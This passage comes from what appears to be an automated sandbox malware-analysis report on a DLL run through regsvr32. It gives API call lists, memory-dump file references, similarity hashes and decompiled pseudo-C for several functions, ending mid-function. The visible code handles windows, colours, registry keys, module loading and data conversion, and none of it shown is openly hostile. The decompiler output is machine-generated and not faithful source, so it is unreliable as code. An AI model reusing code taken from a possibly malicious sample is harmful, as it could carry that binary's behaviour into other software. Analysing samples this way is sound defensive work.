                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 10025F42
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreate$Open
                                                                                                                • String ID: software
                                                                                                                • API String ID: 1740278721-2010147023
                                                                                                                • Opcode ID: a693620a9bdadc2d65233cbb8c755513046fcc4be62f62047e902ce2899f5840
                                                                                                                • Instruction ID: 42a707912d468ef30717d4f9f71364dcb2c1a33e5db109ec3b3fe5a363bbd037
                                                                                                                • Opcode Fuzzy Hash: a693620a9bdadc2d65233cbb8c755513046fcc4be62f62047e902ce2899f5840
                                                                                                                • Instruction Fuzzy Hash: D011B376900159BBDB11DB9ADD88CDFFFBCEF85745F1040AAB505A2121D6719A00DB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10011DDB Relevance: 10.6, APIs: 7, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 10011DE7
                                                                                                                • GetWindowRect.USER32 ref: 10011E02
                                                                                                                • ScreenToClient.USER32(?,?), ref: 10011E15
                                                                                                                • ScreenToClient.USER32(?,?), ref: 10011E1E
                                                                                                                • EqualRect.USER32 ref: 10011E28
                                                                                                                • DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 10011E50
                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 10011E5A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ClientRectScreen$DeferEqualParent
                                                                                                                • String ID:
                                                                                                                • API String ID: 443303494-0
                                                                                                                • Opcode ID: c15a09ac07a48be0984b4a1291725d30e8c33f56f84e94449a3ba1b09cd1a87a
                                                                                                                • Instruction ID: 653b9982ac67d4bb700100f7ae05e2449e18e935689f0f94f15c853775d568fb
                                                                                                                • Opcode Fuzzy Hash: c15a09ac07a48be0984b4a1291725d30e8c33f56f84e94449a3ba1b09cd1a87a
                                                                                                                • Instruction Fuzzy Hash: 2011E67650021AEFEB009FA5CD84EEBBBBDEB89750B14841AED1696254D730E950CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100208C9 Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 84%
                                                                                                                			E100208C9(void* __ecx, long* __edi, void* __esi) {
				long _t22;
				void* _t23;
				void* _t28;
				void* _t31;
				void* _t33;
				signed int _t35;
				long* _t40;
				void* _t41;
				void* _t42;

				_t41 = __esi;
				_t40 = __edi;
				_t31 = __ecx;
				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
				L10048E48(0, 0);
				_t22 = L10001311(_t31, 0, __edi[3], 4);
				_t33 = 2;
				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
				_t46 = _t23;
				if(_t23 == 0) {
					LeaveCriticalSection( *(_t42 - 0x14));
					_t23 = E1000A035(0, _t33, __edi, __esi, _t46);
				}
				 *(_t41 + 0xc) = _t23;
				E10049170(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
				 *(_t41 + 8) = _t40[3];
				TlsSetValue( *_t40, _t41);
				_t35 =  *(_t42 + 8);
				_t28 =  *(_t41 + 0xc);
				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
				}
				_push( *(_t42 - 0x14));
				LeaveCriticalSection();
				return E10047725(_t28);
			}












                                                                                                                0x100208c9
                                                                                                                0x100208c9
                                                                                                                0x100208c9
                                                                                                                0x100208d0
                                                                                                                0x100208da
                                                                                                                0x100208e6
                                                                                                                0x100208ec
                                                                                                                0x100208f1
                                                                                                                0x100208f7
                                                                                                                0x100208f9
                                                                                                                0x100208fe
                                                                                                                0x10020904
                                                                                                                0x10020904
                                                                                                                0x1002090c
                                                                                                                0x1002091d
                                                                                                                0x10020929
                                                                                                                0x1002092e
                                                                                                                0x10020934
                                                                                                                0x10020937
                                                                                                                0x1002093c
                                                                                                                0x10020946
                                                                                                                0x10020946
                                                                                                                0x10020949
                                                                                                                0x1002094f
                                                                                                                0x1002095a

                                                                                                                APIs
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 100208D0
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 100208DA
                                                                                                                  • Part of subcall function 10048E48: RaiseException.KERNEL32(00000001,?,?,00000058,00000001,?,1000CECE,00000000,?,00000058,10006BB6), ref: 10048E88
                                                                                                                • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1), ref: 100208F1
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001,?,1000CECE,00000000), ref: 100208FE
                                                                                                                  • Part of subcall function 1000A035: __CxxThrowException@8.LIBCMT ref: 1000A049
                                                                                                                • _memset.LIBCMT ref: 1002091D
                                                                                                                • TlsSetValue.KERNEL32(?,00000000,00000058,10006BB6), ref: 1002092E
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001,?,1000CECE,00000000), ref: 1002094F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 356813703-0
                                                                                                                • Opcode ID: 98d414390fac9f506d51d5796c25b4fdf544dcfcc370261e34cc0d108f0d8d08
                                                                                                                • Instruction ID: ff238277b6f589a0ea1e9e4a69460dfa4a67d484cbd372cfbc6c4e593db73dcd
                                                                                                                • Opcode Fuzzy Hash: 98d414390fac9f506d51d5796c25b4fdf544dcfcc370261e34cc0d108f0d8d08
                                                                                                                • Instruction Fuzzy Hash: 31118B74100205AFE710EF64CD86DAABBBAFF00350760C569F55AD6562CB30ACA0CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100346D3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E100346D3(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16) {
				void* __esi;
				void* _t14;
				intOrPtr _t17;
				void* _t18;
				struct HINSTANCE__* _t19;
				void* _t31;
				intOrPtr _t35;
				void* _t36;
				void* _t38;

				_t38 = __eflags;
				_t32 = __edi;
				_t31 = __edx;
				_t25 = __ebx;
				SetErrorMode(SetErrorMode(0) | 0x00008001);
				_t14 = E1001E302(__ebx, __edi, SetErrorMode, _t38);
				_t35 = _a4;
				 *((intOrPtr*)(_t14 + 8)) = _t35;
				 *((intOrPtr*)(_t14 + 0xc)) = _t35;
				E1001D754(_t14);
				_t17 =  *((intOrPtr*)(E1001E302(__ebx, __edi, _t35, _t38) + 4));
				_t39 = _t17;
				if(_t17 != 0) {
					 *((intOrPtr*)(_t17 + 0x48)) = _a12;
					 *((intOrPtr*)(_t17 + 0x4c)) = _a16;
					 *((intOrPtr*)(_t17 + 0x44)) = _t35;
					E10034554(_t17, _t31, _t39);
				}
				_t18 = E1001E302(_t25, _t32, _t35, _t39);
				_t40 =  *((char*)(_t18 + 0x14));
				_pop(_t36);
				if( *((char*)(_t18 + 0x14)) == 0) {
					E1001A66C(_t36, _t40);
				}
				_t19 = GetModuleHandleA("user32.dll");
				if(_t19 != 0) {
					 *0x100bda3c = GetProcAddress(_t19, "NotifyWinEvent");
				}
				return 1;
			}












                                                                                                                0x100346d3
                                                                                                                0x100346d3
                                                                                                                0x100346d3
                                                                                                                0x100346d3
                                                                                                                0x100346e4
                                                                                                                0x100346e6
                                                                                                                0x100346eb
                                                                                                                0x100346f1
                                                                                                                0x100346f4
                                                                                                                0x100346f7
                                                                                                                0x10034701
                                                                                                                0x10034704
                                                                                                                0x10034706
                                                                                                                0x1003470c
                                                                                                                0x10034713
                                                                                                                0x10034718
                                                                                                                0x1003471b
                                                                                                                0x1003471b
                                                                                                                0x10034720
                                                                                                                0x10034725
                                                                                                                0x10034729
                                                                                                                0x1003472a
                                                                                                                0x1003472c
                                                                                                                0x1003472c
                                                                                                                0x10034736
                                                                                                                0x1003473e
                                                                                                                0x1003474c
                                                                                                                0x1003474c
                                                                                                                0x10034754

                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000000), ref: 100346DC
                                                                                                                • SetErrorMode.KERNEL32(00000000), ref: 100346E4
                                                                                                                  • Part of subcall function 1001D754: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 1001D795
                                                                                                                  • Part of subcall function 1001D754: SetLastError.KERNEL32(0000006F), ref: 1001D7AF
                                                                                                                • GetModuleHandleA.KERNEL32(user32.dll), ref: 10034736
                                                                                                                • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 10034746
                                                                                                                  • Part of subcall function 10034554: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10034597
                                                                                                                  • Part of subcall function 10034554: PathFindExtensionA.SHLWAPI(?), ref: 100345B1
                                                                                                                  • Part of subcall function 10034554: __strdup.LIBCMT ref: 100345F3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorModule$FileModeName$AddressExtensionFindHandleLastPathProc__strdup
                                                                                                                • String ID: NotifyWinEvent$user32.dll
                                                                                                                • API String ID: 2454351968-597752486
                                                                                                                • Opcode ID: 04f07cf9e20774bfcc8e7641e955138858760e64506312998a73ea294dbfa3f7
                                                                                                                • Instruction ID: 16731b763caebe92f11a0247663d23a88967268bfc2b9bd7345bcb11f66c0e51
                                                                                                                • Opcode Fuzzy Hash: 04f07cf9e20774bfcc8e7641e955138858760e64506312998a73ea294dbfa3f7
                                                                                                                • Instruction Fuzzy Hash: 77018FB8A142508FD701EF24D849A9D3BD4EF05711F06849AF5598F262DB34EC808F62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002128F Relevance: 10.5, APIs: 7, Instructions: 29COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1002128F(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}





                                                                                                                0x10021299
                                                                                                                0x1002129f
                                                                                                                0x100212a6
                                                                                                                0x100212ad
                                                                                                                0x100212b4
                                                                                                                0x100212c1
                                                                                                                0x100212c8
                                                                                                                0x100212cb
                                                                                                                0x100212ce
                                                                                                                0x100212d2

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$Brush
                                                                                                                • String ID:
                                                                                                                • API String ID: 2798902688-0
                                                                                                                • Opcode ID: 8e77d5a660d64319e0ea3c320286592cf55ccb3bfd1d15ac1e67bc420ebbae40
                                                                                                                • Instruction ID: 0cc9ecc0ec31c172d87fef68e107198179d5a768bc50f180919af15bb17b9774
                                                                                                                • Opcode Fuzzy Hash: 8e77d5a660d64319e0ea3c320286592cf55ccb3bfd1d15ac1e67bc420ebbae40
                                                                                                                • Instruction Fuzzy Hash: 76F0FE719407445BE730BF724D49B47BAD1FFC4710F16092EE2818B990D6B5E0419F40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10032245 Relevance: 9.4, APIs: 6, Instructions: 404COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E10032245(void* __ebx, void* __ecx, signed short __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t163;
				signed short _t178;
				signed int _t184;
				signed short _t185;
				intOrPtr* _t187;
				void* _t189;
				signed short _t198;
				signed short _t200;
				signed int _t203;
				signed short _t206;
				signed short _t213;
				signed short _t215;
				signed short _t224;
				long long* _t231;
				intOrPtr* _t235;
				void* _t237;
				void* _t243;
				void* _t246;
				intOrPtr* _t248;
				void* _t254;
				void* _t257;
				signed int _t260;
				signed short _t261;
				signed short _t262;
				signed short _t266;
				signed short _t270;
				intOrPtr* _t271;
				void* _t281;
				signed short _t295;
				void* _t339;
				void* _t341;
				signed short _t343;
				void* _t344;
				intOrPtr* _t345;
				signed int _t346;
				void* _t348;
				intOrPtr _t352;
				signed long long _t358;

				_t342 = __esi;
				_t337 = __edx;
				_t282 = __ecx;
				_t346 = _t348 - 0x64;
				_t163 =  *0x100b9e70; // 0xbb35530
				 *(_t346 + 0x68) = _t163 ^ _t346;
				_push(0xcc);
				E1004764D(0x100908cd, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t346 + 0x4c)) =  *((intOrPtr*)(_t346 + 0x74));
				_t339 = __ecx;
				 *(_t346 + 0x30) = 0;
				_t352 =  *((intOrPtr*)(__ecx + 0x48));
				_t353 = _t352 == 0;
				if(_t352 == 0) {
					L1:
					E1000A069(0, _t282, _t339, _t342, _t353);
				}
				if((0 |  *((intOrPtr*)(_t339 + 0x54)) != 0x00000000) == 0) {
					goto L1;
				}
				E100235FF(_t346 + 0x3c);
				_t343 = 3;
				 *((intOrPtr*)(_t346 - 4)) = 0;
				 *(_t346 + 0x50) = _t343;
				E1002FC83(0,  *((intOrPtr*)(_t339 + 0x54)), _t346,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x50);
				if( *(_t346 + 0x50) != _t343) {
					_t340 =  *((intOrPtr*)(_t339 + 0x54));
					_t178 = E1002DAF2( *((intOrPtr*)(_t339 + 0x54)), __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x50);
					__eflags = _t178;
					if(_t178 == 0) {
						goto L4;
					} else {
						_t184 =  *(_t346 + 0x50) & 0x0000ffff;
						_t345 = __imp__#9;
						__eflags = _t184 - 0x81;
						if(__eflags > 0) {
							_t185 = _t184 - 0x82;
							__eflags = _t185;
							if(__eflags == 0) {
								goto L50;
							} else {
								_t198 = _t185 - 1;
								__eflags = _t198;
								if(__eflags == 0) {
									_t200 = E1002F8B0(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x54);
									__eflags = _t200;
									if(_t200 != 0) {
										__eflags =  *(_t346 + 0x55);
										asm("fild qword [ebp+0x57]");
										if( *(_t346 + 0x55) > 0) {
											do {
												_t139 = _t346 + 0x55;
												 *_t139 =  *(_t346 + 0x55) - 1;
												__eflags =  *_t139;
												_t358 = _t358 /  *0x10099e60;
											} while ( *_t139 != 0);
										}
										__eflags =  *(_t346 + 0x56);
										if( *(_t346 + 0x56) == 0) {
											asm("fchs");
										}
										 *(_t346 - 0x14) = _t358;
										 *(_t346 - 0x1c) = 5;
										 *((char*)(_t346 - 4)) = 0xe;
										E100235DF(_t346 - 0x1c, _t346 + 0x3c, _t346 - 0x1c);
										_t203 = _t346 - 0x1c;
										goto L30;
									}
								} else {
									_t206 = _t198;
									__eflags = _t206;
									if(__eflags == 0) {
										__eflags = E1002F8DA(_t340, _t345, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x34);
										if(__eflags != 0) {
											asm("fldz");
											 *(_t346 + 0x58) = _t358;
											_t337 =  *(_t346 + 0x34);
											 *((intOrPtr*)(_t346 + 0x60)) = 0;
											E10023C56(_t346 + 0x58, _t340, __eflags,  *(_t346 + 0x34),  *(_t346 + 0x36) & 0x0000ffff,  *(_t346 + 0x38) & 0x0000ffff, 0, 0, 0);
											 *_t346 = 7;
											 *(_t346 + 8) =  *(_t346 + 0x58);
											 *((char*)(_t346 - 4)) = 0xf;
											E100235DF(_t346, _t346 + 0x3c, _t346);
											_t203 = _t346;
											goto L30;
										}
									} else {
										_t213 = _t206 - 1;
										__eflags = _t213;
										if(__eflags == 0) {
											_t215 = E1002F90F(_t340, _t345, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x34);
											__eflags = _t215;
											if(_t215 != 0) {
												asm("fldz");
												 *(_t346 + 0x58) = _t358;
												 *((intOrPtr*)(_t346 + 0x60)) = 0;
												E1002D958( *(_t346 + 0x34) & 0x0000ffff,  *(_t346 + 0x36) & 0x0000ffff,  *(_t346 + 0x38) & 0x0000ffff);
												 *(_t346 - 0x4c) = 7;
												 *(_t346 - 0x44) =  *(_t346 + 0x58);
												 *((char*)(_t346 - 4)) = 0x10;
												E100235DF(_t346 - 0x4c, _t346 + 0x3c, _t346 - 0x4c);
												_t203 = _t346 - 0x4c;
												goto L30;
											}
										} else {
											__eflags = _t213 - 1;
											if(__eflags == 0) {
												_t224 = E1002F944(_t340, _t345, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x54);
												__eflags = _t224;
												if(_t224 != 0) {
													_t231 = E1002FBC6(_t346 - 0xd8,  *((short*)(_t346 + 0x54)),  *(_t346 + 0x56) & 0x0000ffff,  *(_t346 + 0x58) & 0x0000ffff,  *(_t346 + 0x5a) & 0x0000ffff,  *(_t346 + 0x5c) & 0x0000ffff,  *(_t346 + 0x5e) & 0x0000ffff);
													 *(_t346 - 0x3c) = 7;
													 *((long long*)(_t346 - 0x34)) =  *_t231;
													 *((char*)(_t346 - 4)) = 0x11;
													E100235DF(_t346 - 0x3c, _t346 + 0x3c, _t346 - 0x3c);
													_t203 = _t346 - 0x3c;
													goto L30;
												}
											}
										}
									}
								}
							}
						} else {
							if(__eflags == 0) {
								_t235 = E1000B543(0, _t346 + 0x50, _t340, _t345, __eflags);
								 *((char*)(_t346 - 4)) = 2;
								_t237 = E10025968(_t346 - 0xbc, _t337, _t340, _t345, __eflags);
								 *((char*)(_t346 - 4)) = 3;
								E100235DF(_t237, _t346 + 0x3c, _t237);
								 *_t345(_t346 - 0xbc,  *_t235, 8, E1002DB23(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
								_t295 =  *(_t346 + 0x50);
								goto L51;
							} else {
								__eflags = _t184 - 8;
								if(__eflags > 0) {
									__eflags = _t184 - 0xb;
									if(__eflags == 0) {
										_t243 = E10023391(_t346 - 0x9c,  *(E1002DB23(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)))) & 0x0000ffff, 0xb);
										 *((char*)(_t346 - 4)) = 0xb;
										E100235DF(_t243, _t346 + 0x3c, _t243);
										_t203 = _t346 - 0x9c;
										goto L30;
									} else {
										__eflags = _t184 - 0xc;
										if(__eflags == 0) {
											_t246 = E10023D77(_t346 - 0x8c, E1002DB23(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
											 *((char*)(_t346 - 4)) = 1;
											E100235DF(_t246, _t346 + 0x3c, _t246);
											_t203 = _t346 - 0x8c;
											goto L30;
										} else {
											__eflags = _t184 - 0xf;
											if(_t184 > 0xf) {
												__eflags = _t184 - 0x11;
												if(__eflags <= 0) {
													_t248 = E1002DB23(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)));
													 *(_t346 - 0x5c) = 0x11;
													 *((char*)(_t346 - 0x54)) =  *_t248;
													 *((char*)(_t346 - 4)) = 6;
													E100235DF(_t346 - 0x5c, _t346 + 0x3c, _t346 - 0x5c);
													_t203 = _t346 - 0x5c;
													goto L30;
												} else {
													__eflags = _t184 - 0x12;
													if(__eflags == 0) {
														goto L27;
													} else {
														__eflags = _t184 - 0x13;
														if(__eflags == 0) {
															goto L26;
														}
													}
												}
											}
										}
									}
								} else {
									if(__eflags == 0) {
										L50:
										_t187 = E1000B053(0, _t346 + 0x30, _t340, _t345, __eflags);
										 *((char*)(_t346 - 4)) = 4;
										_t189 = E10025968(_t346 - 0xcc, _t337, _t340, _t345, __eflags);
										 *((char*)(_t346 - 4)) = 5;
										E100235DF(_t189, _t346 + 0x3c, _t189);
										 *_t345(_t346 - 0xcc,  *_t187, 8, E1002DB23(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
										_t295 =  *(_t346 + 0x30);
										L51:
										__eflags = _t295 + 0xfffffff0;
										 *((char*)(_t346 - 4)) = 0;
										L100013E3(_t295 + 0xfffffff0, _t337);
									} else {
										_t260 = _t184;
										__eflags = _t260;
										if(__eflags == 0) {
											L27:
											_t254 = E10023391(_t346 - 0xac,  *(E1002DB23(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)))) & 0x0000ffff, 2);
											 *((char*)(_t346 - 4)) = 7;
											E100235DF(_t254, _t346 + 0x3c, _t254);
											_t203 = _t346 - 0xac;
											goto L30;
										} else {
											_t261 = _t260 - 1;
											__eflags = _t261;
											if(__eflags == 0) {
												L26:
												_t257 = E100233B8(_t346 - 0x7c,  *(E1002DB23(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)))), 3);
												 *((char*)(_t346 - 4)) = 8;
												E100235DF(_t257, _t346 + 0x3c, _t257);
												_t203 = _t346 - 0x7c;
												goto L30;
											} else {
												_t262 = _t261 - 1;
												__eflags = _t262;
												if(__eflags == 0) {
													 *(_t346 + 0x50) =  *(E1002DB23(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
													 *(_t346 + 0x10) = 4;
													 *(_t346 + 0x18) =  *(_t346 + 0x50);
													 *((char*)(_t346 - 4)) = 9;
													E100235DF(_t346 + 0x10, _t346 + 0x3c, _t346 + 0x10);
													_t203 = _t346 + 0x10;
													goto L30;
												} else {
													_t266 = _t262 - 1;
													__eflags = _t266;
													if(__eflags == 0) {
														 *(_t346 - 0x24) =  *(E1002DB23(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
														 *(_t346 - 0x2c) = 5;
														 *((char*)(_t346 - 4)) = 0xa;
														E100235DF(_t346 - 0x2c, _t346 + 0x3c, _t346 - 0x2c);
														_t203 = _t346 - 0x2c;
														goto L30;
													} else {
														_t270 = _t266 - 1;
														__eflags = _t270;
														if(__eflags == 0) {
															_t271 = E1002DB23(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)));
															 *(_t346 + 0x20) = 6;
